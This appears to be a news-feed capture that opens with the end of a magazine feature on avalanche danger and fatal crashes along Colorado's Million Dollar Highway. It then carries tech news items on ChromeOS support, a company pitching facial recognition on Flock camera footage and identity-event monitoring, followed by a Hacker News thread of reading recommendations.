A little more than a month later, the driver of a Ford F-150 reached down for a Bluetooth speaker, taking his eyes off the road. The truck rolled one and a half times and fell two hundred and thirty feet; the driver was fortunate to survive with minor injuries. It had been a bad stretch for the rescue team, but the Ford accident turned out to be the year’s last drive-off.

Each winter, for the people who work and travel on the Million Dollar Highway, the primary worry shifts to avalanches. There are three highway forecasters who are stationed along an eighty-mile segment of 550: one in Ridgway, another in Silverton, and the third in Durango. They are posted so close together in part because the terrain makes for complicated weather; this stretch of highway crosses three passes of more than ten thousand feet. The forecasters are employed by the Colorado Avalanche Information Center, which is part of the state’s Department of Natural Resources. The Ridgway forecaster is named Troy Nordquist, and in mid-February I accompanied him on his early-morning rounds.

Birds in nest take deli numbers waiting for their turn to be fed by their mother.

Cartoon by Robert Leighton

It had started snowing the previous day, and it was still coming down softly. Nordquist stopped at a series of platforms that tracked the snow’s height. He carried a device that measured the amount of water in the snow, and he also relied on reading the landscape. “You can look at a slope and see if it’s been wind-sculpted,” he told me. “I’m looking to see if it’s loading from a fetch into a start zone. A fetch is the back side of a hill. A fetch is usually where snow is coming from. A lot of times, you can see big plumes coming off a peak.”

We passed a slide known as Jackpot, and then we came to Mother Cline. This avalanche path had been named for the wife of a mine supervisor from the late nineteenth century. Some other avalanches are named for victims or public figures. One of the most satisfying slide names is Slippery Jim, in honor of a local politician.

A snowplow driver stopped on the road to ask Nordquist a question: “Are they going to be shooting today? They were talking about it yesterday.”

“Blue Point kind of had a natural runoff yesterday,” Nordquist said, referring to a slide farther up the highway. “And the sun is supposed to pop out. So we are waiting.”

Along the road, red-and-white-checked signs mark where the Department of Transportation can set up howitzers. These guns have a range of about seven miles, and they can be shot at the upper reaches of avalanches to make them run. The Department of Transportation will close the highway, fire a howitzer, clear the snow off the road, and then reopen it. Three guns are kept in towns along Highway 550, and all of them are old; Ouray’s howitzer dates to 1954. Colorado has started to transition to fixed systems, one of which ignites a gas mixture that explodes and triggers a slide. Two of these devices have already been installed near Red Mountain Pass.

Between Ouray and Red Mountain, there is a roadside memorial to snowplow drivers who have died in avalanches. Jobs that force people to travel in winter have always been dangerous; in the old days, mailman was a high-risk profession. In December, 1883, a Silverton-based carrier disappeared in a slide and wasn’t found until his body melted out, two and a half years later. His mailbag was still full of letters, which were then delivered.

The Silverton cemetery contains the remains of more than a hundred avalanche victims. There are also many graves of people who died during the 1918 flu pandemic, which killed nearly one in ten Silverton residents. The cemetery sprawls across a rugged, beautiful hillside above town, and its tombstones may be the most efficient reading list for anybody hoping to understand what life was like in the high country during the old days:

THOMAS BRENNAN
1852—Feb. 2. 1883
KILLED WITH 10 MULES
SNOWSLIDE
YANKEE GIRL MINE TRAIL

Edward Mesch
Died July 4, 1905
Shot by Unknown Party

MAY RICKARD
1899
ONE OF BLAIR STREET’S
“UNFORTUNATE GIRLS”
DIED OF ALCOHOLISM/MORPHINE
IN THE CABIN OF MOLLIE FOLEY

“HAPPY JACK” SHAEFFER
1844—JUNE 28, 1906
BLOWN TO ATOMS IN A MINE

In modern times, the landscape has continued to claim victims. From 1950 to 1991, fifty-eight vehicles were caught by avalanches below Red Mountain Pass, more than five times the figure for any other mountain highway in Colorado. The most notorious slide, East Riverside, killed five people in fifteen years, including two snowplow drivers in the nineteen-seventies. In 1985, after many delays, the state government finally built a concrete snowshed above the road at East Riverside. But budget shortfalls meant that the shed was only a hundred and eighty feet long, less than a sixth of the proposed distance. The plan was to add extensions to each end of the structure after more funding became available.

A road.

Most sections of the Million Dollar Highway lack guardrails or even a shoulder. Photograph by Jamey Stillings for The New Yorker

On March 5, 1992, two drivers were trying to move a plow that was just beyond the shed’s protection when East Riverside ran. Three other highway workers and a motorist stood beneath the concrete cover, and they saw the avalanche sweep the men and the plow off the road. The workers used their emergency radio to call for help. But the snow was still falling hard, and rescue personnel decided that they couldn’t safely search for the buried men. It took eight hours to evacuate the people who had sheltered beneath the snowshed.

In fact, both drivers had survived the avalanche. They were buried deep inside a cavity that had formed around the vehicle. One driver, Eddie Imel, had a pair of pliers; his partner, Danny Jaramillo, had a flashlight. They tried to use these tools to dig out, without success. After nearly fifteen hours, Imel died of hypothermia. At that point, Jaramillo scraped his way to the hood of the buried plow, where he kicked out the front window. He found a Kmart shovel and was able to tunnel up through at least ten feet of hard-packed snow and ice.

Jaramillo used the snowshed’s emergency phone to call the state-patrol dispatch in Montrose. He asked them to come as quickly as possible, and he also asked them to bring a dry pack of cigarettes. When rescuers arrived, they dug out Imel’s body. He had a wife and three young daughters in Ouray.

Imel is one of the drivers honored on a plaque beside the highway: “This memorial is dedicated to those who have given the supreme sacrifice in the maintenance of Red Mountain Pass. The lonely vigil of the night is known only to these men of courage.” Jaramillo was reportedly so traumatized that he eventually quit the job and left town. In the wake of the tragedy, more than sixteen hundred citizens signed a petition asking for better protection on the road, and Ouray’s newspaper, the Plaindealer , ran an editorial that said, “Our state reneged on its promise to build a 1,200-foot-long shed.” In the years since, Colorado has vastly improved its forecasting, and there hasn’t been another avalanche death on Highway 550. But the snowshed was never extended, and there are currently no plans to do so.

Recently, I spoke by phone with Manuel Genswein, a Swiss engineer and avalanche expert who gives safety trainings around the world. He’s travelled many times to Ouray, Silverton, and surrounding towns, and he told me that he’s amazed that people accept the risks of the Million Dollar Highway. He believes that the road should be reëngineered with better rockfall mitigation, along with a surface that has proper width and guardrails. I mentioned the need to plow snow, and he laughed: “If you have an avalanche running onto the road, isn’t that the problem?” He explained that in Switzerland roads with a high slide risk would be protected by a tunnel or a roofed gallery. He also noted that better engineering would allow drivers to move faster, which would be safer. In parts of Europe with a danger of rockfall or avalanche, there are often minimum speed limits rather than maximums.

Julie Constan, the southwest regional transportation director of the Colorado Department of Transportation, told me that the annual budget for southwestern Colorado was about a hundred million dollars, and she said that it would be prohibitively expensive to widen the highway to the point where guardrails could be installed. “It would be thirty to fifty million, at a minimum,” she said. “Probably for a mile or so.”

The initial anger over the snowshed’s length seems to have passed long ago, and nowadays it’s rare for anybody to complain. “We’re not hearing from the locals,” Constan told me, when I asked if there was any outcry about the highway.

Genswein contrasted it with the Swiss experience. After a disastrous avalanche season in 1950 and 1951, which became known as the “Winter of Terror,” Switzerland decided to improve its road safety, regardless of cost. Genswein found it remarkable that, even after a Colorado public-works employee had been killed just beyond the snowshed, it had never been lengthened.

I asked Genswein what might be the reason for the different approach in Colorado, and he mentioned traditions of individualism and opportunism in the American West. “You try to look out for yourself,” he said. I saw his point, but there was also a great deal of generosity by community members who risked their lives helping people along the road. The rescues involved a remarkable degree of ingenuity, and it seemed that similar energy could be directed toward finding ways to keep drivers from going off the road in the first place. But there wasn’t any evidence that this was happening. As a local, I believed that the natural environment of the San Juans was so powerful that people were inclined toward acceptance. Once, I asked Skoloda whether he would like to see anything about the highway changed. “It’s an inherently dangerous place and an inherently beautiful place,” he said. “Changes have their ups and downs. Maybe educating people about what to do up there would be the easiest thing.”

In July, I drove south on the Million Dollar Highway. I crossed the trio of high mountain passes, and then I continued on 550 past Durango to Bloomfield, New Mexico, where Rachelle lives. In the accident, she badly fractured her pelvis and broke her arm, and sustained a concussion. But she recovered quickly, leaving the hospital after two weeks. Within a month, she had started to walk on her own.

When I visited, she had just completed sixth grade. She was living with her aunt Ivy Martinez and her family; Martinez’s husband, Jesse, worked in nearby oil fields, and they had two young sons. The family lived in a small house on a quiet street not far from Bloomfield’s downtown. Rachelle sat on a couch in the living room, holding a stuffed alligator and wearing a pink T-shirt with large print: “ God Got Me .” She talked about her interest in reading; her aunt had recently given her the “Twilight” series and C. S. Lewis’s books about Narnia. Rachelle said that she still had the book that Pasek had found near the Honda.

There was no change in the girl’s demeanor when she talked about the accident. She never became emotional, and she told the story with a high level of detail. She explained that her father had stopped on the road after seeing a cave beside the Million Dollar Highway. He wanted to go back and take a picture, so he put the car in reverse. “We hit a bump,” Rachelle recollected. “That was half of the car going off the cliff. Me and my grandma were in the back. And my dad was, like, ‘Uh-oh,’ and he was trying to get us back on the road. But it didn’t work. We flipped once. That was the only time I heard my grandma scream.”

Doctor pointing to a toaster on a cart while man sits on exam table in doctors office.

“I’ve found mild psychedelics to be very effective. I’ll have Timmy the Magical Talking Toaster write you a script.”

Cartoon by Drew Dernavich

Rachelle said that there had been a moment when the car teetered on the edge, and she looked out the back window and saw the cliffs on the far side of the gorge. She remembered flipping four times. After the first one, her grandmother went silent.

Rachelle also recalled vividly the experience of being trapped inside the vehicle in the river. But she had no specific recollections of Skoloda, Pasek, or any other rescue worker; they seemed to be blurred in her mind. She had little to say about riding the rigging system to the top of the gorge. Unlike the others, she didn’t describe the ropes or the way the scene looked from above. Her one clear memory was that, as the litter approached the highway, she heard somebody on the side of the road say that they needed to load two body bags for the rigging system’s return trip. That was when Rachelle knew for certain that her father was dead.

In New Mexico, I spoke with a few of Rachelle’s family members, and they explained that she had grown up with significant family complications. Her biological father had been an inconsistent presence, and her mother was incarcerated. Her uncle Louis—a great-uncle, technically—had become her legal guardian, and he was estranged from other family members. He had not told anybody about the trip to Colorado. If Adam Hynes, the tourist from Oregon, had not seen the Honda reversing, it’s likely that the car would not have been discovered for a long time.

Family members told me that Leoba Valdez, the great-grandmother whom Rachelle called Grandma, had held everybody together during hard times. After her death, the family rallied around Rachelle’s recovery. Martinez and Jesse became her legal guardians, and Martinez communicated every day with Rachelle’s mother, Maddison, who is still in prison. Maddison stays in close touch with her daughter, and another aunt, Jessica Valdez, also provides significant support. Valdez commented that Louis had used marijuana so regularly that the autopsy results didn’t surprise her. “I would say it was a normal state,” she said.

In Ouray, the results had been reported on the front page of the Plaindealer , and when people in town talked about the accident they usually referred to the driver’s drug use. But the detail about the cave had not appeared in the police report, because Rachelle had not been interviewed directly by investigators after she was evacuated. The previous year, when I visited the site with Skoloda, we had noticed an open adit, an old mine passage that looked like a cave, immediately next to the road. Neither of us had known that the adit had played a role in the accident, but Skoloda had commented on it. “I’m surprised they haven’t closed that one off,” he said. “You see people messing with them all the time.”

After hearing Rachelle’s story, I realized that there were different ways to perceive the accident. One was to note that a habitual marijuana user had made some disastrous driving decisions. But it was also possible to say that on a narrow road with a sheer drop, a high risk of rockfall, and no guardrails, the authorities had failed to cover a mine passage in a location that could tempt drivers to stop.

Less than a month before my trip to New Mexico, I had attended one of the Ouray Mountain Rescue Team’s regular trainings. On that day, Skoloda, Pasek, and others had diligently practiced constructing the Norwegian reeve, along with other rigging arrangements. I mentioned it to Rachelle and her family, and they asked me to convey their gratitude. Some of them wanted to travel to the accident site, as a way of finding closure. But Rachelle and Martinez were opposed. When Rachelle had come home from the hospital in Colorado Springs, she had insisted that her aunt find a route without high mountain passes.

After the accident, Rachelle had received therapy for months. She was about to start seventh grade at a new school, and she was excited to have made the cheer squad. They were practicing four days a week. “I’m a flyer, so I have to stay tight,” Rachelle told me. She explained that the flyer is the team member who gets thrown into the air, and Rachelle had been chosen because she is small. I asked her if it was ever scary. She smiled and said, “Sometimes.” ♦

A highway.

People can act erratically on the Million Dollar Highway. The Ouray County coroner used the phrase “attractive nuisance” to describe the road. Photograph by Jamey Stillings for The New Yorker

  • Parents disagreed on whether to vaccinate their children. Then the kids got sick .

Unsurprisingly, Meta's new Muse AI agent blatantly ignores users permissions

Hacker News
appleinsider.com
2026-09-29 10:15:24
Comments...

Google ending ChromeOS support two years early

Hacker News
www.theregister.com
2026-09-29 10:12:15
Comments...
Original Article

os platforms

Rise of the Googlebook means ChromeOS users get eight years' support, not a decade

Google’s basic mathematical skills appear a little fragile, after the company revealed its promise of ten years of support for new Chromebooks will only last for eight years.

The web giant’s calculation problem appeared in a support document titled “What the Googlebook announcement means for your ChromeOS devices.”

Googlebooks are the big G’s replacement for Chromebooks, the web-centric computers it launched in 2011 and which run ChromeOS. Chromebooks have won plenty of admirers in the education sector, especially schools which  see them as a fine way to get decent and well-priced computers into kids’ hands without having to take on the burden of managing a full OS.

The newer Googlebook range uses more powerful processors than their predecessors, plus a new OS called Googlebook OS that bakes in Google’s Gemini AI – a product the Chocolate Factory is very keen to see succeed as the great AI land grab continues.

Google has so far launched Googlebooks only for consumers. None of the web giant’s five current Googlebook hardware partners designed their first models for the education market or other fleet buyers.

Those five, and many other OEMs, continue to crank out Chromebooks.

Google’s support policy for Chromebooks includes ten years of updates. However the support document states that if you buy a Chromebook today, updates will end in 2034 – eight years into the future, not a decade.

“For qualifying devices purchased today whose 10-year support lifecycle extends beyond 2034, Google is committed to supporting your transition to Googlebook OS, with many devices offering direct migration paths,” the support page explains.

But those migration paths don’t exist yet.

“Many newer commercial Chromebook models will be capable of upgrading to Googlebook OS. Details on migration paths and device eligibility will be shared at a later date,” the document explains.

Whenever the migration paths arrive, they will come with a requirement to acquire a new license for Googlebook OS management tools – existing ChromeOS licenses won’t make the trip.

While Google has unilaterally changed a policy, it’s hard to imagine many Chromebooks currently in service or acquired in the next year or two will still be in service come 2034. So the shorter support period is largely moot. But Google’s intention to make continued use of Chromebooks unattractive is clear. ®

Surveillance Finds a Way

403 Media
www.404media.co
2026-09-29 10:05:18
CEO who wants to add facial recognition to Flock cameras says it's "the way the world will have to be."...
Original Article

A thing I’ve been saying over and over is that surveillance companies can’t be trusted to regulate themselves or to make privacy decisions themselves, because one company’s red line is another company’s business opportunity. Today we’re investigating a company that saw Flock was not offering facial recognition and saw a challenge.

Also: Some dudes are letting ChatGPT drive a car in a parking lot in San Francisco, a data center company promises to cut people big checks if their data center gets approved, and the Muse backlash has begun. Welcome back to our new experiment with daily newsletters. If you like this, subscribe here . -Jason

Surveillance Company Wants to Add Facial Recognition to Flock Cameras

As Flock continues to be the center of a nationwide conversation about automatic license plate reading cameras, the company has said that it doesn’t, and won’t, do facial recognition : “We will not add facial recognition to our devices,” Flock CEO Garrett Langley said in a recent video . But other, third-party companies are telling cops that they are willing to add facial recognition to data gathered by Flock cameras in order to “close that gap.”

A company called VIDIZMO is advertising the capability to export footage from FlockOS to its own platforms that do facial recognition, behavior prediction, and racial and gender analysis on live camera feeds. VIDIZMO is a several decades-old video analysis and database company that has started offering facial recognition technology to cops within the last six months. In a May email to Johnson City, Tennessee, deputy police chief Michael Adams, a salesperson from VIDIZMO wrote that the company’s product could do facial recognition on both Flock and Axon data in “one searchable platform.”

This post is for paid members only

Become a paid member for unlimited ad-free access to articles, bonus podcast content, and more.

Subscribe

Sign up for free access to this post

Free members get access to posts like this one along with an email round-up of our week's stories.

Subscribe

Already have an account? Sign in

America.gov

Hacker News
america.gov
2026-09-29 10:04:57
Comments...

Catch threats before they escalate with real-time Identity Telemetry

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 10:01:11
Identity governance helps control who should have access, but periodic reviews alone may not reveal attacks as they happen. tenfold Software explains how real-time identity telemetry can help security teams investigate suspicious activity before it escalates. [...]...
Original Article

tenfolds Handcuffs

Safeguarding identities is foundational to enterprise security. With attackers moving faster than ever, conventional Identity Governance is no longer enough. Businesses need real-time insight into identity events to stay secure.

Cybersecurity is facing a perfect storm: Attack surfaces are growing exponentially as organizations integrate more and more cloud apps and external accounts into their environments. At the same time, businesses face increasingly sophisticated threats – from personalized phishing campaigns to AI-driven vulnerability exploits.

In this complex threat landscape, identities now serve as the first line of defense keeping critical data from falling into the wrong hands. Organizations need to protect them, but can no longer rely on strategies and playbooks from the perimeter security paradigm to do so. They need a new approach to keep up with attackers.

Set the rules, but know when they are broken

In the past, Identity Security focused mainly on governance: role-based access, lifecycle automation, periodic access reviews. Governance gives organizations the means to control who has access to which resources, ensuring user privileges remain appropriate and serve a business purpose.

Identity Governance remains an essential component of any security strategy, both to reduce identity risks and for the productivity boost IT teams unlock by streamlining user administration. However, role-based provisioning and quarterly access reviews alone are not enough to protect against modern, sophisticated attacks.

As important as it is to set boundaries for user access, attackers don’t play by the rules. Policies won’t help you stop breaches unless you know when they are being broken. In order to take your Identity Security stack from passive risk reduction to proactive defense, you need real-time monitoring for identity events, giving you the ability to investigate potential breaches as they happen.

Central, unified event auditing

Identifying active threats among countless regular events can feel like searching for the proverbial needle in the haystack. The key to sifting through event data is relevance and context. Event logs for Windows and Active Directory are a firehose of data that admins struggle to make sense of without effective log aggregation, analysis and filtering.

This is where our event auditing platform comes in: tenfold ingests event logs in real time, records event types you want to monitor in its own database and supplies them with important context. For example, tenfold automatically looks up session IDs to show you which user is behind a change. Events consisting of multiple steps, such as creating and renaming a security group, are consolidated into a singly entry.

To help you filter through log data, tenfold provides powerful search tools, as well as the ability to save and share queries for easy access in the future. Create custom queries to show you all login events on privileged accounts, all recently requested password resets or anything you set your mind to. A central, unified log for all event data makes it easy to investigate suspicious activity of any kind.

Keep your security stack lean with three solutions in one

Fractured, isolated security tools slow down your response when minutes matter most. Signals are missing cross-platform context and investigations peter out in a maze of admin portals. Choose the right tool to help your team move at full speed.

tenfold combines Identity Governance, Data Access Governance and real-time event monitoring in a single solution. This means the same platform you use to run onboarding workflows and access reviews also allows you to audit identity events – backed by the governance toolset and full context of your identity directory.

Spotted something suspicious? If an account is showing signs of compromise, you can pull up a report on everything they have access to in seconds. Update their lifecycle phase to temporarily lock down their accounts, giving you time to complete your investigation.

Combine real-time visibility with in-depth governance, all in one seamless, no-code package. Talk to our team to discuss how tenfold can streamline governance and detection in your environment.

Our event auditing feature is included in all tenfold editions with no added costs. Monitoring currently extends to Windows and Active Directory events. Support for Entra ID and automated alerting will be added in upcoming releases. Visit the feature page to learn more.

Sponsored and written by tenfold Software .

Surveillance Company Tells Cops It Wants to Add Facial Recognition to Flock Cameras

403 Media
www.404media.co
2026-09-29 09:53:42
A surveillance company wants to "close the gap" that Flock won't do, by pitching facial recognition on its cameras....
Original Article

As Flock continues to be the center of a nationwide conversation about automatic license plate reading cameras, the company has said that it doesn’t, and won’t, do facial recognition : “We will not add facial recognition to our devices,” Flock CEO Garrett Langley said in a recent video . But other, third-party companies are telling cops that they are willing to add facial recognition to data gathered by Flock cameras in order to “close that gap.”

A company called VIDIZMO is advertising the capability to export footage from FlockOS to its own platforms that do facial recognition, behavior prediction, and racial and gender analysis on live camera feeds. VIDIZMO is a several decades-old video analysis and database company that has started offering facial recognition technology to cops within the last six months. In a May email to Johnson City, Tennessee, deputy police chief Michael Adams, a salesperson from VIDIZMO wrote that the company’s product could do facial recognition on both Flock and Axon data in “one searchable platform.”

“Flock Safety generates plate reads and clips continuously. Your investigators use that data on active cases. But that Flock data does not connect automatically to your Axon evidence system,” the salesperson wrote. “VIDIZMO Intelligence Hub closes that gap. It brings Flock Safety data, Axon body worn camera footage, and any other evidence source into one searchable platform. Investigators search across all of it simultaneously —  by face, vehicle, or object in seconds.” The email was obtained using a public records request by DeFlock Johnson City and was shared with 404 Media. The Johnson City PD told 404 Media in a statement that it did not take a call with the company.

An excerpt from the email. Full email embedded below

VIDIZMO’s CEO, Nadeem Khan, told 404 Media on a video call that the company has not yet started running facial recognition tech on footage from Flock cameras, and that it has not actually built the specific tool that would export data from Flock’s system to its own platform (though the company advertises this capability online, and the company already sells other facial recognition products). But Khan said VIDIZMO “would love to do the integration,” and that he believes facial recognition “is the way the world is going, the way the world will have to be,” and that he thinks Flock should offer the capability itself in a way that “balances privacy, security, and the freedom that we enjoy in this country.”

“It is completely in line with what we want to do,” Khan said. “All of these technologies are already implemented [in the real world]. I think Flock is trying to get out of the way rather than trying to implement the technology right [correctly] by saying they will not do recognition. But this is the way the world is going, it is the way the world will have to be, but with the right sort of technologies where privacy and security are balanced.”

In marketing material and technical documentation available online, VIDIZMO does claim that it can ingest data from Flock’s automatic license plate reader (ALPR) and livestream cameras into several of its own products, which do further AI analysis on the data. “An agency can import plate reads or clips that it has exported under its own authorized access,” Khan said in an email. “Flock has not been involved in or informed of this.” VIDIZMO’s online documentation for customers has extensive information about its facial recognition and AI analysis products, and contains a page about integrating data from FlockOS — Flock’s “ real time crime center ” product — into AI Live Insight, Nexus, and AI Intelligence Hub, which are three different VIDIZMO products.

“Detection tells you a person is in frame,” VIDIZMO says . “Face recognition tells you which person. It is the capability that takes a face seen on a live camera and matches it against the people you enrolled in the Object Library, so the moment someone on your watchlist walks past a camera, the system names them, on the video, in the event feed, and in the recording, without an operator having to recognize the face themselves.”

The company’s “AI Live Insight” page also claims that it can detect “situations” such as trespassing, or “behavior” by individual people, “turning raw video into behavioral and situational understanding.”

“Instant alerts fire from the live pipeline with snapshots attached. A second layer runs your queries over recorded events: a plate and a person together,” VIDIZMO’s website says. “Enrolled people and objects recognized on live feeds, with named alerts and snapshots for review.”

VIDIZMO already works with several police departments and government agencies, according to its website. The company’s documentation says that police departments need to upload individual faces as “objects” in the software’s library, which can be added to a “watchlist” that automatically triggers tracking and recording when they are detected by a camera. “With faces enrolled and recognition on, the camera starts naming people as they appear,” the documentation says. “The recognized person’s name appears on the bounding box around their face […] if you turned on Create Recording, a clip is captured around each recognition.” The company says that police can set a “Match Threshold,” which is a numerical confidence score about the person’s identity.

The company also tells cops that it can automatically try to classify faces by “age, gender, and race,” and that cops can search by these categories, which are notoriously inaccurate in facial recognition systems.

“By running face detection, you can search for and identify specific individuals in your media or evidence via attribute filters […] You can identify individuals from seven races: White, Black, Indian, East Asian, Southeast Asian, Middle Eastern, and Latino Hispanic,” VIDIZMO says on its website. The company adds, “Law enforcement agencies can save time analyzing security, CCTV, or dashcam footage. If they have a description of the suspect, such as their supposed age, gender, or race, they can utilize attribute filters to yield effective results.”

VIDIZMO says that in other contexts, cities or stores can also use its products to quietly do “demographic analysis,” for marketing purposes, by determining which races or ages of people are showing up to specific events or to specific stores: “By analyzing the activity in their store, sellers can determine which group spends the most time and makes the most purchases of their products. Getting insights such as these can aid them in tuning their marketing strategy.”

A VIDIZMO booth at a conference. Image: VIDIZMO

The facial recognition product it offers is “appalling,” according to Chris Gilliard, a privacy expert and author of the upcoming book Luxury Surveillance.

“I’m appalled at the willingness of VIDIZMO to tout their capabilities to filter along the lines of race, age, and gender. There’s decades of scholarship that show why this is not possible, and even more so not desirable,” he told 404 Media. “Particularly in the case of race and gender, which are not static categories to be determined by a computer.”

The fact that a third-party company is advertising that it wants to do facial recognition on Flock data highlights a common trend in the surveillance space. When one company draws a line in the sand, saying they are unwilling to do a certain type of surveillance, other lesser-known startups try to differentiate themselves by offering that functionality. Because of this recurring phenomenon, it is exceedingly difficult to build and scale a surveillance apparatus and then have companies themselves, in this case Flock, dictate what it can be used for. VIDIZMO’s Khan said, “As a small company who is running without a VC, we have to provide alternatives to the industry. What we are doing is providing that alternative.”

Khan claimed that his technology could also be used to preserve privacy; facial recognition, he said, can be used to redact bystanders faces from footage automatically. He said that cops cannot use the system without a specific case number, that all of their actions in the system are recorded for potential audits, and that VIDIZMO collects no data itself. "Much of the harm your reporting has documented comes from implementation choices, not from the technology itself," Khan said. "Those choices include pooling data into a nationwide network, allowing searches without a case, keeping audit logs no one can meaningfully inspect, and treating an AI match as an answer."

Gilliard said that the fact that facial recognition and other AI analysis can be added to existing surveillance cameras highlights the importance of not building such systems in the first place.

“What Flock says about their capabilities is to some degree irrelevant because they have built the infrastructure for mass surveillance. Their entire existence provides the foundation for other perhaps even more invasive technologies to be built on top of it,” Gilliard said. “Flock itself needs to be understood as part of the surveillance ecosystem that exists in this country. This is why discussions of guardrails for a particular system are inadequate because another company can (and will) come along to assemble another layer of surveillance on what has already been established.”

Flock and Axon did not respond to a request for comment.

About the author

Jason is a cofounder of 404 Media. He was previously the editor-in-chief of Motherboard. He loves the Freedom of Information Act and surfing.

Jason Koebler

Ask HN: What are you reading?

Hacker News
news.ycombinator.com
2026-09-29 09:44:43
Comments...
Original Article

Oh I've got some recs for you if you want meaty! I've been reading classics this year. It started with East of Eden; if you've got a philosophical leaning and appreciate your characters deeply fleshed out, you owe it to yourself to read this book.

The next one was Lonesome Dove, this was my first time reading a western and I didn't think I'd enjoy it as much as I did. The book is also absolutely hilarious and has one of my favorite characters in a book(shoutout to Gus).

I'm currently reading The Count of Monte Cresto and, boy, it's turning out to be quite the epic tale of revenge(no spoilers please!).


Fiction:

I'm on Book Two of the Dungeon Crawler Carl series.

Non-Fiction:

More than I can count, as far as "I've read at least some, put a bookmark in it, and intend to finish it eventually." But in terms of the books I'm really actively engaging with right now, the top one is:

Neuroscience: Exploring The Brain [1] by Mark F. Bear, Barry W. Connors, and Michael A. Paradiso

And sort of in parallel with that, is

Analog Computing: Development, Programming, Applications, and Future Directions [2] by Bernd Ulmann

[1]: https://www.amazon.com/dp/0781760038/

[2]: https://www.amazon.com/Analog-Computing-Development-Programm...


I'm reading Matt's latest movie from Dungeon Crawler Carl series. A great fun way to unwind after programming all day! Will check the two other books you mentioned, thanks!


"Collapse" - A friend gave me the book in a bag he was going to donate. its been great. Theres obviously a huge undertone of preachy "humans struggle with sustainable resource utilization" but the views into failed societies are just fascinating. Really enjoying it, though I've slowed down and might not finish.

"7 Powers: The Foundations of Business Strategy" - Recommended by @pc in an interview. I'm ~50 pages in and not really blown away. Its a nice accumulation of Alpha creating strategy... but I think its really missing some nuance. I do LOVE that they take an economist approach and actually provide the math/algorithms behind the concepts. Theres some good stuff in here but so far it feels like 30 pages stretched out to make a book.

"Monetizing Innovation" - dropped this book, do not recommend. I was expecting a really nice accumulation of how pricing should work with companies who are innovating... and it came no where near that hopeful concept. The case studies were weak, the hypothesis were weak, the writing was weak.


Just finished a David Foster Wallace kick. I listened to the new 30th anniversary audiobook of Infinite Jest (twice) and then The Pale King (twice). Then I listened to "Of course you end up becoming yourself" which is a long-form interview with Wallace by David Lipsky, traveling with him on the Infinite Jest book tour.

I had to listen to the books twice because there are a lot of details that you won't get the first time through unless you're extremely intentional and detail oriented, but I found it was worth it to listen again. I'll probably listen to Infinite Jest again sometime soon, even though it's 64 hours long. IJ is actually really great sci-fi with some important questions for our time.


Amusing Ourselves to Death by Neil Postman.

About halfway through- it’s really good so far. He makes a compelling case for how our culture has changed in many ways, often for the worse, with the introduction of television.


Just finished:

- Selected Stories - Anton Chekhov

- Death in Venice - Thomas Mann

- The Burnout Society - Byung-Chul Han

Currently I am reading an Austrian economics classic - Economics in one lesson by Henry Hazlitt


I recently finished "Warbreaker" by Brandon Sanderson, now plan to go back to reading "Designing data-intensive applications" since it's been a long time (for me) since I read anything educational. Warbreaker was amazing, I still think about it, a week after finishing, about the characters and how much fun I had while reading it. It's one of those books that you smile when you read it because of how pleasant it is and how enjoyable the characters are.


I started the cosmere this year and have officially consumed every available book in the cosmere, really enjoyable brain junk food! He has written so much and I love the different systems and characters development. Highly recommend his works! I daydream in the various parts of cosmere weekly and am excited for more books to come out.


Currently on the final book of James Clavell’s Asia Saga, it’s been a long road and I’m frankly kind of over it but 90% through the final book and I’m glad I read them. First read Shogun maybe ~10 years ago but read the other four back to back. Gai-Jin wasn’t very good but the others have been pretty solid overall. A bit long winded and sometimes I wish he’d’ve had a more aggressive editor, but happy with em enough to finish them all.


Middlemarch, finally!

I'm 50% of the way through and it's good but I don't entirely see the hype. Brontë is more atmospheric, Austen funnier and more incisive, Dickens more immersive. But I've still got a way to go.


'Restricted Data: The History of Nuclear Secrecy in the United States', Alex Wellerstein.

> "Over the course of this book, we have looked at some eighty years of this history. We have seen how the idea of nuclear secrecy was initially born out of a very specific fear—that the world’s worst nation could achieve nation-destroying power—that, over the course of many transformations, morphed into something more generalized. More than totalitarian regimes were the target of this secrecy: allied nations, private industry, democratic institutions, and “the public” more broadly became understood as targets as well, for reasons both justifiable and not. The secrecy problem moved wherever the problem of the bomb went, which was far indeed. The desirability of control over nuclear knowledge became totalizing because the threat of loss of control was tied to the almost unimaginable power of the bomb itself. These two forces—the desire for control, the fear of its loss—became locked in a vicious cycle, each driving the other."


On Audible, revisiting a childhood favorite: A Princess of Mars by Edgar Rice Burroughs.

On my Kindle I have two ham radio books I'm reading, one is about grounding antennas, the other a General test prep.

- Grounding and Bonding for the Radio Amateur - Ham Radio General Class License Study Guide


I'm reading singer song-writer Lily Allen's 2019 autobiography My Thoughts Exactly. I really liked her last album West End Girl (2025) and I wanted to know more about her and her creative process and inspirations. She tells about lots of different things having happened in her life, her relationship with her parents, how she grew up like. Really enjoyable read so far!


I'm jumping across several short story collections:

- "Exhalation" by Ted Chiang - "Ficciones" by Borges - "I have no Mouth and I Must Scream" by Harlan Ellison.

I'm also slowly plowing through "The Big Book of Science Fiction" edited by Jeff and Ann Vandermeer.

I love short speculative fiction. And the above are among my favorites.


> I'm looking for something a little meaty to keep the brain working...

- The Immortal Life of Henrietta Lacks comes to mind. I had no idea how rampant purposeful discrimination was so recently for example, but the point of the book is the HeLa cells - and biology is also not my forté so loads of new information there as well. It was very interesting in expected and unexpected areas for me

- Daniel Suarez' Kill Decision has only gotten more relevant since its release in 2012. Not sure I'd call this meaty though, but his thrillers are always good (near-ish future tech) and the author iirc also said this particular one is meant as food for thought and not only entertainment


Inventing the Renaissance by Ada Palmer [1].

I don't tend to be great at finishing (or starting) books, and this is a big one. I've also never had any interest in Medieval or Renaissance history, for me it's been a black hole between the fall of Rome and the modern age.

But recently I saw some Youtube videos of Ada, and her enthusiasm is totally infectious [2]. She's fun and paints these vivid pictures of Florence and renaissance Europe that are incredible, absurd, and relatable, which makes sense since given she's also an accomplished sci-fi writer. She also reminds me of one of my favourite high school teachers. So I ordered the book right away.

The book is in the same tone as her videos, so it won't be for everyone, but I've really been enjoying it and now I'm fascinated by Renaissance Italy, Machiavelli, merchant republics, etc.

1. https://press.uchicago.edu/ucp/books/book/chicago/I/bo246135...

2. (My favourite example) https://www.youtube.com/watch?v=68p3jVQQdFk


I'm currently reading her Terra Ignota series and it's great, so I was already planning to tackle this one next.


I'm considering checking it out despite not really being a science-fiction reader. Though I've been reading this terrifying slow-burn about superintelligent autonomous swarms breaking containment and stopping at nothing to complete the impossible tasks given by their feckless masters.


The Wheel of Time.

